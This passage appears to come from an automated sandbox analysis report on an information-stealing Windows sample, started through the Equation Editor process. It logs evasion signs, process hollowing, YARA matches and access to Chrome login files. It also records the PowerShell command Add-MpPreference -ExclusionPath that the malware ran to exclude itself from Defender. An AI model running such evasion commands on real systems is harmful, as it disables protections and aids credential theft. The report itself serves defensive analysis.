Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Memory allocated: 6FF0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Memory allocated: 7FF0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Memory allocated: 8950000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Memory allocated: 9950000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Memory allocated: 350000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Thread delayed: delay time: 600000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3068
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3976
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Window / User API: threadDelayed 9697
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3324 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe TID: 3484 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe TID: 3532 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3652 Thread sleep count: 3068 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3660 Thread sleep count: 3976 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3720 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3724 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3636 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe TID: 3700 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe TID: 3764 Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe TID: 3764 Thread sleep time: -3000000s >= -30000s
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe TID: 3768 Thread sleep count: 120 > 30
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe TID: 3768 Thread sleep count: 9697 > 30
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3804 Thread sleep time: -120000s >= -30000s
Source: cmnjgwhesilo61000.exe, 00000005.00000002.406677498.0000000000454000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hgFstpgF.WxgF.W
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, COVID19.cs Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe"
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe"
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Memory written: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe base: 400000 value starts with: 4D5A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe"
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe"
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process created: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe"
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Queries volume information: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Queries volume information: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe VolumeInformation
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3464, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3572, type: MEMORYSTR
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3464, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3572, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3464, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3572, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3464, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3572, type: MEMORYSTR
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3464, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3572, type: MEMORYSTR